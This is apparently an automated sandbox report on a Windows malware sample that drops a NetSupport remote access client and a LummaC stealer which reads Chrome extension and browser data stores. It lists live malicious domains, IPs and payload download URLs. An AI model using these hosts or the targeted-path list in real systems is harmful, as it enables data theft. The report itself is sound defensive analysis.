                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                Remote Access Functionality

                                barindex
                                Yara detected LummaC Stealer
                                Source: Yara matchFile source: 21.2.Close.exe.pif.1000000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.Close.exe.pif.1000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000013.00000003.742951268.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714649771.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.717533692.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.742876893.0000000003B61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714824323.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.743032494.0000000004C77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.717322865.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.827312389.0000000001000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.743009888.0000000003B3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.743109153.0000000004C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714597273.00000000053F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.714476620.0000000004C29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Close.exe.pif PID: 4916, type: MEMORYSTR
                                Source: Yara matchFile source: 1.2.client32.exe.e30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.6d080000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.client32.exe.6d090000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.client32.exe.e30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.0.client32.exe.e30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.6d090000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.client32.exe.e30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.client32.exe.6d080000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.client32.exe.6d080000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.0.client32.exe.e30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.e30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.client32.exe.6cd80000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.client32.exe.6d090000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.368688274.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.367232590.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.827413930.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.627325284.0000000000618000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.319169996.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.350058442.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000000.347982915.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5676, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2400, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 836, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                1
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                Exploitation for Privilege Escalation                                		11
                                Deobfuscate/Decode Files or Information                                		1
                                OS Credential Dumping                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		Exfiltration Over Other Network Medium2
                                Ingress Tool Transfer                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default Accounts3
                                Native API                                		1
                                Valid Accounts                                		1
                                DLL Side-Loading                                		31
                                Obfuscated Files or Information                                		2
                                Input Capture                                		4
                                File and Directory Discovery                                		Remote Desktop Protocol1
                                Data from Local System                                		Exfiltration Over Bluetooth11
                                Encrypted Channel                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain Accounts12
                                Command and Scripting Interpreter                                		1
                                Registry Run Keys / Startup Folder                                		1
                                Valid Accounts                                		131
                                Software Packing                                		Security Account Manager43
                                System Information Discovery                                		SMB/Windows Admin Shares1
                                Screen Capture                                		Automated Exfiltration11
                                Non-Standard Port                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local AccountsAt (Windows)Logon Script (Mac)1
                                Access Token Manipulation                                		1
                                DLL Side-Loading                                		NTDS141
                                Security Software Discovery                                		Distributed Component Object Model2
                                Input Capture                                		Scheduled Transfer3
                                Non-Application Layer Protocol                                		SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon Script112
                                Process Injection                                		11
                                Masquerading                                		LSA Secrets2
                                Process Discovery                                		SSH1
                                Clipboard Data                                		Data Transfer Size Limits4
                                Application Layer Protocol                                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.common1
                                Registry Run Keys / Startup Folder                                		1
                                Valid Accounts                                		Cached Domain Credentials31
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                                Access Token Manipulation                                		DCSync11
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
                                Virtualization/Sandbox Evasion                                		Proc Filesystem11
                                Remote System Discovery                                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)112
                                Process Injection                                		/etc/passwd and /etc/shadow1
                                System Network Configuration Discovery                                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 831174 Sample: 0ud2VlMOvF.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 100 84 Snort IDS alert for network traffic 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 Multi AV Scanner detection for submitted file 2->88 90 3 other signatures 2->90 11 0ud2VlMOvF.exe 1 32 2->11         started        16 client32.exe 2->16         started        18 client32.exe 2->18         started        process3 dnsIp4 76 mediainfotv.xyz 198.54.121.245, 443, 49695, 49696 NAMECHEAP-NETUS United States 11->76 56 C:\Users\user\AppData\...\remcmdstub.exe, PE32 11->56 dropped 58 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 11->58 dropped 60 C:\Users\user\AppData\...\client32.exe, PE32 11->60 dropped 62 7 other files (none is malicious) 11->62 dropped 96 Detected unpacking (creates a PE file in dynamic memory) 11->96 98 Performs DNS queries to domains with low reputation 11->98 20 rrrr.exe 18 11->20         started        23 client32.exe 17 11->23         started        file5 signatures6 process7 dnsIp8 54 C:\Users\user\AppData\Local\...ngine.exe, PE32 20->54 dropped 27 Engine.exe 503 20->27         started        70 upl0ad3d.com 109.107.178.106, 2552, 49697 TELEPORT-TV-ASRU Russian Federation 23->70 72 geography.netsupportsoftware.com 51.142.119.24, 49698, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United Kingdom 23->72 74 geo.netsupportsoftware.com 23->74 94 Multi AV Scanner detection for dropped file 23->94 file9 signatures10 process11 process12 29 cmd.exe 1 27->29         started        signatures13 100 Obfuscated command line found 29->100 102 Uses ping.exe to sleep 29->102 104 Drops PE files with a suspicious file extension 29->104 106 Uses ping.exe to check the status of other devices and networks 29->106 32 cmd.exe 4 29->32         started        36 conhost.exe 29->36         started        process14 file15 52 C:\Users\user\AppData\Local\...\Close.exe.pif, PE32 32->52 dropped 78 Obfuscated command line found 32->78 80 Uses ping.exe to sleep 32->80 38 Close.exe.pif 32->38         started        42 PING.EXE 32->42         started        44 powershell.exe 11 32->44         started        46 2 other processes 32->46 signatures16 process17 dnsIp18 66 tOetxOrXardQngRI.tOetxOrXardQngRI 38->66 92 Injects a PE file into a foreign processes 38->92 48 Close.exe.pif 38->48         started        68 192.168.2.1 unknown unknown 42->68 signatures19 process20 dnsIp21 64 82.118.23.50, 80 GREENFLOID-ASUA Ukraine 48->64 82 Tries to harvest and steal browser information (history, passwords, etc) 48->82 signatures22

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                0ud2VlMOvF.exe5%ReversingLabs
                                0ud2VlMOvF.exe10%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif4%ReversingLabs
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\AudioCapture.dll4%ReversingLabs
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\HTCTL32.DLL4%ReversingLabs
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICHEK.DLL5%ReversingLabs
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICL32.DLL7%ReversingLabsWin32.Trojan.NetSup
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\TCCTL32.DLL7%ReversingLabs
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe23%ReversingLabsWin32.Trojan.NetSup
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\pcicapi.dll5%ReversingLabs
                                C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\remcmdstub.exe5%ReversingLabs

                                Unpacked PE Files

                                SourceDetectionScannerLabelLinkDownload
                                10.0.Engine.exe.400000.0.unpack100%AviraTR/Crypt.ULPM.GenDownload File
                                3.2.client32.exe.111b8c68.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                1.2.client32.exe.111b8c68.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                2.2.client32.exe.111b8c68.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.pci.co.uk/support0%URL Reputationsafe
                                http://www.pci.co.uk/supportsupport0%URL Reputationsafe
                                http://ocsp.thawte.com00%URL Reputationsafe
                                http://127.0.0.1RESUMEPRINTING0%URL Reputationsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                http://109.107.178.106/fakeurl.htm0%Avira URL Cloudsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                http://www.pantaray.com0%VirustotalBrowse
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://mediainfotv.xyz/rr.zip0%Avira URL Cloudsafe
                                http://www.pantaray.com0%Avira URL Cloudsafe
                                https://mediainfotv.xyz/nesup3.zip0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geography.netsupportsoftware.com
                                		51.142.119.24
                                		truefalse
                                  		high
                                  mediainfotv.xyz
                                  		198.54.121.245
                                  		truetrue
                                    		unknown
                                    upl0ad3d.com
                                    		109.107.178.106
                                    		truetrue
                                      		unknown
                                      geo.netsupportsoftware.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        tOetxOrXardQngRI.tOetxOrXardQngRI
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://geo.netsupportsoftware.com/location/loca.aspfalse
                                            		high
                                            http://109.107.178.106/fakeurl.htmtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://mediainfotv.xyz/rr.zipfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://mediainfotv.xyz/nesup3.zipfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.autoitscript.com/autoit3/Jrrrr.exe, 00000009.00000003.638565223.0000000002A51000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638487280.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638565223.0000000002A2C000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.pci.co.uk/supportclient32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://%s/testpage.htmwininet.dllclient32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpfalse
                                                		high
                                                http://www.pci.co.uk/supportsupportclient32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://ocsp.thawte.com0rrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632381076.00000000027CA000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631656746.00000000022EC000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.643014805.00000000022C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.pantaray.comrrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000578000.00000008.00000001.01000000.0000000F.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                http://geo.netsupportsoftware.com/location/loca.aspLMEMclient32.exe, 00000001.00000003.328602468.0000000005186000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328401582.0000000005162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328996167.0000000005190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://%s/testpage.htmclient32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://127.0.0.1client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.autoitscript.com/autoit3/rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://%s/fakeurl.htmclient32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://crl.thawte.com/ThawteCodeSigningCA.crl0rrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631656746.00000000022EC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://geo.netsupportsoftware.com/location/loca.aspaclient32.exe, 00000001.00000003.326358193.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323361228.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327217206.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.384862941.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327017392.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000002.827940603.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.325965285.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328706032.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323841496.0000000005129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://geo.netsupportsoftware.com/location/loca.aspoclient32.exe, 00000001.00000003.321893899.0000000005140000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326847295.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326818541.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322613100.000000000519E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.324728406.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327481078.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323631873.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323841496.0000000005162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327784492.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326508942.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.323217863.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322135117.000000000518E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327309274.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.321961161.0000000005142000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.324561077.000000000519E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.netsupportschool.com/tutor-assistant.asp11(Lclient32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpfalse
                                                            		high
                                                            http://crl.thawte.com/ThawtePremiumServerCA.crl0rrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631656746.00000000022EC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://geo.netsupportsoftware.com/location/loca.asp)client32.exe, 00000001.00000003.322259578.0000000005125000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322246564.0000000005121000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.322465247.0000000005128000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpfalse
                                                                  		high
